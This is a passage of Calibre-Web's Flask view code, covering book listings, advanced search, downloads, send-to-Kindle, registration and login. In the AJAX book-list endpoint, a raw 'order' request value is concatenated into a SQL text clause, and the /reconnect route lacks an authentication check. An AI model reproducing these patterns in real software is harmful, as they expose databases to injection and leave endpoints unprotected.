try:
if are_read:
db_filter = db.cc_classes[config.config_read_column].value == True
else:
db_filter = coalesce(db.cc_classes[config.config_read_column].value, False) != True
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db_filter,
order,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series,
db.cc_classes[config.config_read_column])
except (KeyError, AttributeError):
log.error("Custom Column No.%d is not existing in calibre database", config.config_read_column)
if not as_xml:
flash(_("Custom Column No.%(column)d is not existing in calibre database",
column=config.config_read_column),
category="error")
return redirect(url_for("web.index"))
# ToDo: Handle error Case for opds
if as_xml:
return entries, pagination
else:
if are_read:
name = _(u'Read Books') + ' (' + str(pagination.total_count) + ')'
pagename = "read"
else:
name = _(u'Unread Books') + ' (' + str(pagination.total_count) + ')'
pagename = "unread"
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
title=name, page=pagename)
def render_archived_books(page, order):
order = order or []
archived_books = (
ub.session.query(ub.ArchivedBook)
.filter(ub.ArchivedBook.user_id == int(current_user.id))
.filter(ub.ArchivedBook.is_archived == True)
.all()
)
archived_book_ids = [archived_book.book_id for archived_book in archived_books]
archived_filter = db.Books.id.in_(archived_book_ids)
entries, random, pagination = calibre_db.fill_indexpage_with_archived_books(page, 0,
db.Books,
archived_filter,
order,
allow_show_archived=True)
name = _(u'Archived Books') + ' (' + str(len(archived_book_ids)) + ')'
pagename = "archived"
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
title=name, page=pagename)
def render_prepare_search_form(cc):
# prepare data for search-form
tags = calibre_db.session.query(db.Tags)\
.join(db.books_tags_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag'))\
.order_by(db.Tags.name).all()
series = calibre_db.session.query(db.Series)\
.join(db.books_series_link)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series'))\
.order_by(db.Series.name)\
.filter(calibre_db.common_filters()).all()
shelves = ub.session.query(ub.Shelf)\
.filter(or_(ub.Shelf.is_public == 1, ub.Shelf.user_id == int(current_user.id)))\
.order_by(ub.Shelf.name).all()
extensions = calibre_db.session.query(db.Data)\
.join(db.Books)\
.filter(calibre_db.common_filters()) \
.group_by(db.Data.format)\
.order_by(db.Data.format).all()
if current_user.filter_language() == u"all":
languages = calibre_db.speaking_language()
else:
languages = None
return render_title_template('search_form.html', tags=tags, languages=languages, extensions=extensions,
series=series,shelves=shelves, title=_(u"Advanced Search"), cc=cc, page="advsearch")
def render_search_results(term, offset=None, order=None, limit=None):
join = db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
entries, result_count, pagination = calibre_db.get_search_results(term, offset, order, limit, *join)
return render_title_template('search.html',
searchterm=term,
pagination=pagination,
query=term,
adv_searchterm=term,
entries=entries,
result_count=result_count,
title=_(u"Search"),
page="search")
# ################################### View Books list ##################################################################
@web.route("/", defaults={'page': 1})
@web.route('/page/<int:page>')
@login_required_if_no_ano
def index(page):
sort_param = (request.args.get('sort') or 'stored').lower()
return render_books_list("newest", sort_param, 1, page)
@web.route('/<data>/<sort_param>', defaults={'page': 1, 'book_id': 1})
@web.route('/<data>/<sort_param>/', defaults={'page': 1, 'book_id': 1})
@web.route('/<data>/<sort_param>/<book_id>', defaults={'page': 1})
@web.route('/<data>/<sort_param>/<book_id>/<int:page>')
@login_required_if_no_ano
def books_list(data, sort_param, book_id, page):
return render_books_list(data, sort_param, book_id, page)
@web.route("/table")
@login_required
def books_table():
visibility = current_user.view_settings.get('table', {})
return render_title_template('book_table.html', title=_(u"Books List"), page="book_table",
visiblility=visibility)
@web.route("/ajax/listbooks")
@login_required
def list_books():
off = int(request.args.get("offset") or 0)
limit = int(request.args.get("limit") or config.config_books_per_page)
search = request.args.get("search")
sort = request.args.get("sort", "id")
order = request.args.get("order", "").lower()
state = None
join = tuple()
if sort == "state":
state = json.loads(request.args.get("state", "[]"))
elif sort == "tags":
order = [db.Tags.name.asc()] if order == "asc" else [db.Tags.name.desc()]
join = db.books_tags_link,db.Books.id == db.books_tags_link.c.book, db.Tags
elif sort == "series":
order = [db.Series.name.asc()] if order == "asc" else [db.Series.name.desc()]
join = db.books_series_link,db.Books.id == db.books_series_link.c.book, db.Series
elif sort == "publishers":
order = [db.Publishers.name.asc()] if order == "asc" else [db.Publishers.name.desc()]
join = db.books_publishers_link,db.Books.id == db.books_publishers_link.c.book, db.Publishers
elif sort == "authors":
order = [db.Authors.name.asc(), db.Series.name, db.Books.series_index] if order == "asc" \
else [db.Authors.name.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
join = db.books_authors_link, db.Books.id == db.books_authors_link.c.book, db.Authors, \
db.books_series_link, db.Books.id == db.books_series_link.c.book, db.Series
elif sort == "languages":
order = [db.Languages.lang_code.asc()] if order == "asc" else [db.Languages.lang_code.desc()]
join = db.books_languages_link, db.Books.id == db.books_languages_link.c.book, db.Languages
elif order and sort in ["sort", "title", "authors_sort", "series_index"]:
order = [text(sort + " " + order)]
elif not state:
order = [db.Books.timestamp.desc()]
total_count = filtered_count = calibre_db.session.query(db.Books).count()
if state:
if search:
books = calibre_db.search_query(search).all()
filtered_count = len(books)
else:
books = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).all()
entries = calibre_db.get_checkbox_sorted(books, state, off, limit, order)
elif search:
entries, filtered_count, __ = calibre_db.get_search_results(search, off, order, limit, *join)
else:
entries, __, __ = calibre_db.fill_indexpage((int(off) / (int(limit)) + 1), limit, db.Books, True, order, *join)
for entry in entries:
for index in range(0, len(entry.languages)):
entry.languages[index].language_name = isoLanguages.get_language_name(get_locale(), entry.languages[
index].lang_code)
#try:
# entry.languages[index].language_name = LC.parse(entry.languages[index].lang_code)\
# .get_language_name(get_locale())
#except UnknownLocaleError:
# entry.languages[index].language_name = _(
# isoLanguages.get(part3=entry.languages[index].lang_code).name)
table_entries = {'totalNotFiltered': total_count, 'total': filtered_count, "rows": entries}
js_list = json.dumps(table_entries, cls=db.AlchemyEncoder)
response = make_response(js_list)
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@web.route("/ajax/table_settings", methods=['POST'])
@login_required
def update_table_settings():
# vals = request.get_json()
# ToDo: Save table settings
current_user.view_settings['table'] = json.loads(request.data)
try:
try:
flag_modified(current_user, "view_settings")
except AttributeError:
pass
ub.session.commit()
except (InvalidRequestError, OperationalError):
log.error("Invalid request received: %r ", request, )
return "Invalid request", 400
return ""
@web.route("/author")
@login_required_if_no_ano
def author_list():
if current_user.check_visibility(constants.SIDEBAR_AUTHOR):
if current_user.get_view_property('author', 'dir') == 'desc':
order = db.Authors.sort.desc()
order_no = 0
else:
order = db.Authors.sort.asc()
order_no = 1
entries = calibre_db.session.query(db.Authors, func.count('books_authors_link.book').label('count')) \
.join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_authors_link.author')).order_by(order).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Authors.sort, 1, 1)).label('char')) \
.join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Authors.sort, 1, 1))).all()
# If not creating a copy, readonly databases can not display authornames with "|" in it as changing the name
# starts a change session
autor_copy = copy.deepcopy(entries)
for entry in autor_copy:
entry.Authors.name = entry.Authors.name.replace('|', ',')
return render_title_template('list.html', entries=autor_copy, folder='web.books_list', charlist=charlist,
title=u"Authors", page="authorlist", data='author', order=order_no)
else:
abort(404)
@web.route("/downloadlist")
@login_required_if_no_ano
def download_list():
if current_user.get_view_property('download', 'dir') == 'desc':
order = ub.User.name.desc()
order_no = 0
else:
order = ub.User.name.asc()
order_no = 1
if current_user.check_visibility(constants.SIDEBAR_DOWNLOAD) and current_user.role_admin():
entries = ub.session.query(ub.User, func.count(ub.Downloads.book_id).label('count'))\
.join(ub.Downloads).group_by(ub.Downloads.user_id).order_by(order).all()
charlist = ub.session.query(func.upper(func.substr(ub.User.name, 1, 1)).label('char')) \
.filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS) \
.group_by(func.upper(func.substr(ub.User.name, 1, 1))).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Downloads"), page="downloadlist", data="download", order=order_no)
else:
abort(404)
@web.route("/publisher")
@login_required_if_no_ano
def publisher_list():
if current_user.get_view_property('publisher', 'dir') == 'desc':
order = db.Publishers.name.desc()
order_no = 0
else:
order = db.Publishers.name.asc()
order_no = 1
if current_user.check_visibility(constants.SIDEBAR_PUBLISHER):
entries = calibre_db.session.query(db.Publishers, func.count('books_publishers_link.book').label('count')) \
.join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_publishers_link.publisher')).order_by(order).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Publishers.name, 1, 1)).label('char')) \
.join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Publishers.name, 1, 1))).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Publishers"), page="publisherlist", data="publisher", order=order_no)
else:
abort(404)
@web.route("/series")
@login_required_if_no_ano
def series_list():
if current_user.check_visibility(constants.SIDEBAR_SERIES):
if current_user.get_view_property('series', 'dir') == 'desc':
order = db.Series.sort.desc()
order_no = 0
else:
order = db.Series.sort.asc()
order_no = 1
if current_user.get_view_property('series', 'series_view') == 'list':
entries = calibre_db.session.query(db.Series, func.count('books_series_link.book').label('count')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series')).order_by(order).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Series"), page="serieslist", data="series")
else:
entries = calibre_db.session.query(db.Books, func.count('books_series_link').label('count')) \
.join(db.books_series_link).join(db.Series).filter(calibre_db.common_filters()) \
.group_by(text('books_series_link.series')).order_by(order).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
.join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
return render_title_template('grid.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Series"), page="serieslist", data="series", bodyClass="grid-view",
order=order_no)
else:
abort(404)
@web.route("/ratings")
@login_required_if_no_ano
def ratings_list():
if current_user.check_visibility(constants.SIDEBAR_RATING):
if current_user.get_view_property('ratings', 'dir') == 'desc':
order = db.Ratings.rating.desc()
order_no = 0
else:
order = db.Ratings.rating.asc()
order_no = 1
entries = calibre_db.session.query(db.Ratings, func.count('books_ratings_link.book').label('count'),
(db.Ratings.rating / 2).label('name')) \
.join(db.books_ratings_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(text('books_ratings_link.rating')).order_by(order).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=list(),
title=_(u"Ratings list"), page="ratingslist", data="ratings", order=order_no)
else:
abort(404)
@web.route("/formats")
@login_required_if_no_ano
def formats_list():
if current_user.check_visibility(constants.SIDEBAR_FORMAT):
if current_user.get_view_property('ratings', 'dir') == 'desc':
order = db.Data.format.desc()
order_no = 0
else:
order = db.Data.format.asc()
order_no = 1
entries = calibre_db.session.query(db.Data,
func.count('data.book').label('count'),
db.Data.format.label('format')) \
.join(db.Books).filter(calibre_db.common_filters()) \
.group_by(db.Data.format).order_by(order).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=list(),
title=_(u"File formats list"), page="formatslist", data="formats", order=order_no)
else:
abort(404)
@web.route("/language")
@login_required_if_no_ano
def language_overview():
if current_user.check_visibility(constants.SIDEBAR_LANGUAGE):
charlist = list()
if current_user.filter_language() == u"all":
languages = calibre_db.speaking_language()
# ToDo: generate first character list for languages
else:
#try:
# cur_l = LC.parse(current_user.filter_language())
#except UnknownLocaleError:
# cur_l = None
languages = calibre_db.session.query(db.Languages).filter(
db.Languages.lang_code == current_user.filter_language()).all()
languages[0].name = isoLanguages.get_language_name(get_locale(), languages[0].name.lang_code)
#if cur_l:
# languages[0].name = cur_l.get_language_name(get_locale())
#else:
# languages[0].name = _(isoLanguages.get(part3=languages[0].lang_code).name)
lang_counter = calibre_db.session.query(db.books_languages_link,
func.count('books_languages_link.book').label('bookcount')).group_by(
text('books_languages_link.lang_code')).all()
return render_title_template('languages.html', languages=languages, lang_counter=lang_counter,
charlist=charlist, title=_(u"Languages"), page="langlist",
data="language")
else:
abort(404)
@web.route("/category")
@login_required_if_no_ano
def category_list():
if current_user.check_visibility(constants.SIDEBAR_CATEGORY):
if current_user.get_view_property('category', 'dir') == 'desc':
order = db.Tags.name.desc()
order_no = 0
else:
order = db.Tags.name.asc()
order_no = 1
entries = calibre_db.session.query(db.Tags, func.count('books_tags_link.book').label('count')) \
.join(db.books_tags_link).join(db.Books).order_by(order).filter(calibre_db.common_filters()) \
.group_by(text('books_tags_link.tag')).all()
charlist = calibre_db.session.query(func.upper(func.substr(db.Tags.name, 1, 1)).label('char')) \
.join(db.books_tags_link).join(db.Books).filter(calibre_db.common_filters()) \
.group_by(func.upper(func.substr(db.Tags.name, 1, 1))).all()
return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
title=_(u"Categories"), page="catlist", data="category", order=order_no)
else:
abort(404)
# ################################### Task functions ################################################################
@web.route("/tasks")
@login_required
def get_tasks_status():
# if current user admin, show all email, otherwise only own emails
tasks = WorkerThread.getInstance().tasks
answer = render_task_status(tasks)
return render_title_template('tasks.html', entries=answer, title=_(u"Tasks"), page="tasks")
@app.route("/reconnect")
def reconnect():
calibre_db.reconnect_db(config, ub.app_DB_path)
return json.dumps({})
# ################################### Search functions ################################################################
@web.route("/search", methods=["GET"])
@login_required_if_no_ano
def search():
term = request.args.get("query")
if term:
return redirect(url_for('web.books_list', data="search", sort_param='stored', query=term))
else:
return render_title_template('search.html',
searchterm="",
result_count=0,
title=_(u"Search"),
page="search")
@web.route("/advsearch", methods=['POST'])
@login_required_if_no_ano
def advanced_search():
values = dict(request.form)
params = ['include_tag', 'exclude_tag', 'include_serie', 'exclude_serie', 'include_shelf', 'exclude_shelf',
'include_language', 'exclude_language', 'include_extension', 'exclude_extension']
for param in params:
values[param] = list(request.form.getlist(param))
flask_session['query'] = json.dumps(values)
return redirect(url_for('web.books_list', data="advsearch", sort_param='stored', query=""))
def adv_search_custom_columns(cc, term, q):
for c in cc:
if c.datatype == "datetime":
custom_start = term.get('custom_column_' + str(c.id) + '_start')
custom_end = term.get('custom_column_' + str(c.id) + '_end')
if custom_start:
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.datetime(db.cc_classes[c.id].value) >= func.datetime(custom_start)))
if custom_end:
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.datetime(db.cc_classes[c.id].value) <= func.datetime(custom_end)))
else:
custom_query = term.get('custom_column_' + str(c.id))
if custom_query != '' and custom_query is not None:
if c.datatype == 'bool':
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == (custom_query == "True")))
elif c.datatype == 'int' or c.datatype == 'float':
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == custom_query))
elif c.datatype == 'rating':
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
db.cc_classes[c.id].value == int(float(custom_query) * 2)))
else:
q = q.filter(getattr(db.Books, 'custom_column_' + str(c.id)).any(
func.lower(db.cc_classes[c.id].value).ilike("%" + custom_query + "%")))
return q
def adv_search_language(q, include_languages_inputs, exclude_languages_inputs):
if current_user.filter_language() != "all":
q = q.filter(db.Books.languages.any(db.Languages.lang_code == current_user.filter_language()))
else:
for language in include_languages_inputs:
q = q.filter(db.Books.languages.any(db.Languages.id == language))
for language in exclude_languages_inputs:
q = q.filter(not_(db.Books.series.any(db.Languages.id == language)))
return q
def adv_search_ratings(q, rating_high, rating_low):
if rating_high:
rating_high = int(rating_high) * 2
q = q.filter(db.Books.ratings.any(db.Ratings.rating <= rating_high))
if rating_low:
rating_low = int(rating_low) * 2
q = q.filter(db.Books.ratings.any(db.Ratings.rating >= rating_low))
return q
def adv_search_read_status(q, read_status):
if read_status:
if config.config_read_column:
try:
if read_status == "True":
q = q.join(db.cc_classes[config.config_read_column], isouter=True) \
.filter(db.cc_classes[config.config_read_column].value == True)
else:
q = q.join(db.cc_classes[config.config_read_column], isouter=True) \
.filter(coalesce(db.cc_classes[config.config_read_column].value, False) != True)
except (KeyError, AttributeError):
log.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
flash(_("Custom Column No.%(column)d is not existing in calibre database",
column=config.config_read_column),
category="error")
return q
else:
if read_status == "True":
q = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
.filter(ub.ReadBook.user_id == int(current_user.id),
ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
else:
q = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
.filter(ub.ReadBook.user_id == int(current_user.id),
coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED)
return q
def adv_search_extension(q, include_extension_inputs, exclude_extension_inputs):
for extension in include_extension_inputs:
q = q.filter(db.Books.data.any(db.Data.format == extension))
for extension in exclude_extension_inputs:
q = q.filter(not_(db.Books.data.any(db.Data.format == extension)))
return q
def adv_search_tag(q, include_tag_inputs, exclude_tag_inputs):
for tag in include_tag_inputs:
q = q.filter(db.Books.tags.any(db.Tags.id == tag))
for tag in exclude_tag_inputs:
q = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
return q
def adv_search_serie(q, include_series_inputs, exclude_series_inputs):
for serie in include_series_inputs:
q = q.filter(db.Books.series.any(db.Series.id == serie))
for serie in exclude_series_inputs:
q = q.filter(not_(db.Books.series.any(db.Series.id == serie)))
return q
def adv_search_shelf(q, include_shelf_inputs, exclude_shelf_inputs):
q = q.outerjoin(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)\
.filter(or_(ub.BookShelf.shelf == None, ub.BookShelf.shelf.notin_(exclude_shelf_inputs)))
if len(include_shelf_inputs) > 0:
q = q.filter(ub.BookShelf.shelf.in_(include_shelf_inputs))
return q
def extend_search_term(searchterm,
author_name,
book_title,
publisher,
pub_start,
pub_end,
tags,
rating_high,
rating_low,
read_status,
):
searchterm.extend((author_name.replace('|', ','), book_title, publisher))
if pub_start:
try:
searchterm.extend([_(u"Published after ") +
format_date(datetime.strptime(pub_start, "%Y-%m-%d"),
format='medium', locale=get_locale())])
except ValueError:
pub_start = u""
if pub_end:
try:
searchterm.extend([_(u"Published before ") +
format_date(datetime.strptime(pub_end, "%Y-%m-%d"),
format='medium', locale=get_locale())])
except ValueError:
pub_start = u""
elements = {'tag': db.Tags, 'serie':db.Series, 'shelf':ub.Shelf}
for key, db_element in elements.items():
tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(tags['include_' + key])).all()
searchterm.extend(tag.name for tag in tag_names)
tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(tags['exclude_' + key])).all()
searchterm.extend(tag.name for tag in tag_names)
language_names = calibre_db.session.query(db.Languages). \
filter(db.Languages.id.in_(tags['include_language'])).all()
if language_names:
language_names = calibre_db.speaking_language(language_names)
searchterm.extend(language.name for language in language_names)
language_names = calibre_db.session.query(db.Languages). \
filter(db.Languages.id.in_(tags['exclude_language'])).all()
if language_names:
language_names = calibre_db.speaking_language(language_names)
searchterm.extend(language.name for language in language_names)
if rating_high:
searchterm.extend([_(u"Rating <= %(rating)s", rating=rating_high)])
if rating_low:
searchterm.extend([_(u"Rating >= %(rating)s", rating=rating_low)])
if read_status:
searchterm.extend([_(u"Read Status = %(status)s", status=read_status)])
searchterm.extend(ext for ext in tags['include_extension'])
searchterm.extend(ext for ext in tags['exclude_extension'])
# handle custom columns
searchterm = " + ".join(filter(None, searchterm))
return searchterm, pub_start, pub_end
def render_adv_search_results(term, offset=None, order=None, limit=None):
order = order or [db.Books.sort]
pagination = None
cc = get_cc_columns(filter_config_custom_read=True)
calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
q = calibre_db.session.query(db.Books).outerjoin(db.books_series_link, db.Books.id == db.books_series_link.c.book)\
.outerjoin(db.Series)\
.filter(calibre_db.common_filters(True))
# parse multiselects to a complete dict
tags = dict()
elements = ['tag', 'serie', 'shelf', 'language', 'extension']
for element in elements:
tags['include_' + element] = term.get('include_' + element)
tags['exclude_' + element] = term.get('exclude_' + element)
author_name = term.get("author_name")
book_title = term.get("book_title")
publisher = term.get("publisher")
pub_start = term.get("publishstart")
pub_end = term.get("publishend")
rating_low = term.get("ratinghigh")
rating_high = term.get("ratinglow")
description = term.get("comment")
read_status = term.get("read_status")
if author_name:
author_name = author_name.strip().lower().replace(',', '|')
if book_title:
book_title = book_title.strip().lower()
if publisher:
publisher = publisher.strip().lower()
searchterm = []
cc_present = False
for c in cc:
if c.datatype == "datetime":
column_start = term.get('custom_column_' + str(c.id) + '_start')
column_end = term.get('custom_column_' + str(c.id) + '_end')
if column_start:
searchterm.extend([u"{} >= {}".format(c.name,
format_date(datetime.strptime(column_start, "%Y-%m-%d"),
format='medium',
locale=get_locale())
)])
cc_present = True
if column_end:
searchterm.extend([u"{} <= {}".format(c.name,
format_date(datetime.strptime(column_end, "%Y-%m-%d").date(),
format='medium',
locale=get_locale())
)])
cc_present = True
elif term.get('custom_column_' + str(c.id)):
searchterm.extend([(u"{}: {}".format(c.name, term.get('custom_column_' + str(c.id))))])
cc_present = True
if any(tags.values()) or author_name or book_title or publisher or pub_start or pub_end or rating_low \
or rating_high or description or cc_present or read_status:
searchterm, pub_start, pub_end = extend_search_term(searchterm,
author_name,
book_title,
publisher,
pub_start,
pub_end,
tags,
rating_high,
rating_low,
read_status)
q = q.filter()
if author_name:
q = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + author_name + "%")))
if book_title:
q = q.filter(func.lower(db.Books.title).ilike("%" + book_title + "%"))
if pub_start:
q = q.filter(func.datetime(db.Books.pubdate) > func.datetime(pub_start))
if pub_end:
q = q.filter(func.datetime(db.Books.pubdate) < func.datetime(pub_end))
q = adv_search_read_status(q, read_status)
if publisher:
q = q.filter(db.Books.publishers.any(func.lower(db.Publishers.name).ilike("%" + publisher + "%")))
q = adv_search_tag(q, tags['include_tag'], tags['exclude_tag'])
q = adv_search_serie(q, tags['include_serie'], tags['exclude_serie'])
q = adv_search_shelf(q, tags['include_shelf'], tags['exclude_shelf'])
q = adv_search_extension(q, tags['include_extension'], tags['exclude_extension'])
q = adv_search_language(q, tags['include_language'], tags['exclude_language'])
q = adv_search_ratings(q, rating_high, rating_low)
if description:
q = q.filter(db.Books.comments.any(func.lower(db.Comments.text).ilike("%" + description + "%")))
# search custom culumns
try:
q = adv_search_custom_columns(cc, term, q)
except AttributeError as ex:
log.debug_or_exception(ex)
flash(_("Error on search for custom columns, please restart Calibre-Web"), category="error")
q = q.order_by(*order).all()
flask_session['query'] = json.dumps(term)
ub.store_ids(q)
result_count = len(q)
if offset != None and limit != None:
offset = int(offset)
limit_all = offset + int(limit)
pagination = Pagination((offset / (int(limit)) + 1), limit, result_count)
else:
offset = 0
limit_all = result_count
return render_title_template('search.html',
adv_searchterm=searchterm,
pagination=pagination,
entries=q[offset:limit_all],
result_count=result_count,
title=_(u"Advanced Search"), page="advsearch")
@web.route("/advsearch", methods=['GET'])
@login_required_if_no_ano
def advanced_search_form():
# Build custom columns names
cc = get_cc_columns(filter_config_custom_read=True)
return render_prepare_search_form(cc)
# ################################### Download/Send ##################################################################
@web.route("/cover/<int:book_id>")
@login_required_if_no_ano
def get_cover(book_id):
return get_book_cover(book_id)
@web.route("/robots.txt")
def get_robots():
return send_from_directory(constants.STATIC_DIR, "robots.txt")
@web.route("/show/<int:book_id>/<book_format>", defaults={'anyname': 'None'})
@web.route("/show/<int:book_id>/<book_format>/<anyname>")
@login_required_if_no_ano
@viewer_required
def serve_book(book_id, book_format, anyname):
book_format = book_format.split(".")[0]
book = calibre_db.get_book(book_id)
data = calibre_db.get_book_format(book_id, book_format.upper())
if not data:
return "File not in Database"
log.info('Serving book: %s', data.name)
if config.config_use_google_drive:
try:
headers = Headers()
headers["Content-Type"] = mimetypes.types_map.get('.' + book_format, "application/octet-stream")
df = getFileFromEbooksFolder(book.path, data.name + "." + book_format)
return do_gdrive_download(df, headers, (book_format.upper() == 'TXT'))
except AttributeError as ex:
log.debug_or_exception(ex)
return "File Not Found"
else:
if book_format.upper() == 'TXT':
try:
rawdata = open(os.path.join(config.config_calibre_dir, book.path, data.name + "." + book_format),
"rb").read()
result = chardet.detect(rawdata)
return make_response(
rawdata.decode(result['encoding'], 'surrogatepass').encode('utf-8', 'surrogatepass'))
except FileNotFoundError:
log.error("File Not Found")
return "File Not Found"
return send_from_directory(os.path.join(config.config_calibre_dir, book.path), data.name + "." + book_format)
@web.route("/download/<int:book_id>/<book_format>", defaults={'anyname': 'None'})
@web.route("/download/<int:book_id>/<book_format>/<anyname>")
@login_required_if_no_ano
@download_required
def download_link(book_id, book_format, anyname):
client = "kobo" if "Kobo" in request.headers.get('User-Agent') else ""
return get_download_link(book_id, book_format, client)
@web.route('/send/<int:book_id>/<book_format>/<int:convert>')
@login_required
@download_required
def send_to_kindle(book_id, book_format, convert):
if not config.get_mail_server_configured():
flash(_(u"Please configure the SMTP mail settings first..."), category="error")
elif current_user.kindle_mail:
result = send_mail(book_id, book_format, convert, current_user.kindle_mail, config.config_calibre_dir,
current_user.name)
if result is None:
flash(_(u"Book successfully queued for sending to %(kindlemail)s", kindlemail=current_user.kindle_mail),
category="success")
ub.update_download(book_id, int(current_user.id))
else:
flash(_(u"Oops! There was an error sending this book: %(res)s", res=result), category="error")
else:
flash(_(u"Please update your profile with a valid Send to Kindle E-mail Address."), category="error")
if "HTTP_REFERER" in request.environ:
return redirect(request.environ["HTTP_REFERER"])
else:
return redirect(url_for('web.index'))
# ################################### Login Logout ##################################################################
@web.route('/register', methods=['GET', 'POST'])
def register():
if not config.config_public_reg:
abort(404)
if current_user is not None and current_user.is_authenticated:
return redirect(url_for('web.index'))
if not config.get_mail_server_configured():
flash(_(u"E-Mail server is not configured, please contact your administrator!"), category="error")
return render_title_template('register.html', title=_("Register"), page="register")
if request.method == "POST":
to_save = request.form.to_dict()
nickname = to_save["email"].strip() if config.config_register_email else to_save.get('name')
if not nickname or not to_save.get("email"):
flash(_(u"Please fill out all fields!"), category="error")
return render_title_template('register.html', title=_("Register"), page="register")
try:
nickname = check_username(nickname)
email = check_email(to_save["email"])
except Exception as ex:
flash(str(ex), category="error")
return render_title_template('register.html', title=_("Register"), page="register")
content = ub.User()
if check_valid_domain(email):
content.name = nickname
content.email = email
password = generate_random_password()
content.password = generate_password_hash(password)
content.role = config.config_default_role
content.sidebar_view = config.config_default_show
try:
ub.session.add(content)
ub.session.commit()
if feature_support['oauth']:
register_user_with_oauth(content)
send_registration_mail(to_save["email"].strip(), nickname, password)
except Exception:
ub.session.rollback()
flash(_(u"An unknown error occurred. Please try again later."), category="error")
return render_title_template('register.html', title=_("Register"), page="register")
else:
flash(_(u"Your e-mail is not allowed to register"), category="error")
log.warning('Registering failed for user "%s" e-mail address: %s', nickname, to_save["email"])
return render_title_template('register.html', title=_("Register"), page="register")
flash(_(u"Confirmation e-mail was send to your e-mail account."), category="success")
return redirect(url_for('web.login'))
if feature_support['oauth']:
register_user_with_oauth()
return render_title_template('register.html', config=config, title=_("Register"), page="register")
@web.route('/login', methods=['GET', 'POST'])
def login():
#if not config.db_configured:
# log.debug(u"Redirect to initial configuration")
# return redirect(url_for('admin.basic_configuration'))
if current_user is not None and current_user.is_authenticated:
return redirect(url_for('web.index'))
if config.config_login_type == constants.LOGIN_LDAP and not services.ldap:
log.error(u"Cannot activate LDAP authentication")
flash(_(u"Cannot activate LDAP authentication"), category="error")
if request.method == "POST":
form = request.form.to_dict()
user = ub.session.query(ub.User).filter(func.lower(ub.User.name) == form['username'].strip().lower()) \
.first()
if config.config_login_type == constants.LOGIN_LDAP and services.ldap and user and form['password'] != "":
login_result, error = services.ldap.bind_user(form['username'], form['password'])
if login_result:
login_user(user, remember=bool(form.get('remember_me')))
ub.store_user_session()
log.debug(u"You are now logged in as: '%s'", user.name)
flash(_(u"you are now logged in as: '%(nickname)s'", nickname=user.name),
category="success")
return redirect_back(url_for("web.index"))
elif login_result is None and user and check_password_hash(str(user.password), form['password']) \
and user.name != "Guest":
login_user(user, remember=bool(form.get('remember_me')))
ub.store_user_session()
log.info("Local Fallback Login as: '%s'", user.name)
flash(_(u"Fallback Login as: '%(nickname)s', LDAP Server not reachable, or user not known",
nickname=user.name),
category="warning")
return redirect_back(url_for("web.index"))
elif login_result is None:
log.info(error)
flash(_(u"Could not login: %(message)s", message=error), category="error")
else:
ip_Address = request.headers.get('X-Forwarded-For', request.remote_addr)
log.warning('LDAP Login failed for user "%s" IP-address: %s', form['username'], ip_Address)
flash(_(u"Wrong Username or Password"), category="error")
else:
ip_Address = request.headers.get('X-Forwarded-For', request.remote_addr)
if 'forgot' in form and form['forgot'] == 'forgot':
if user != None and user.name != "Guest":
ret, __ = reset_password(user.id)
if ret == 1:
flash(_(u"New Password was send to your email address"), category="info")
log.info('Password reset for user "%s" IP-address: %s', form['username'], ip_Address)
else:
log.error(u"An unknown error occurred. Please try again later")
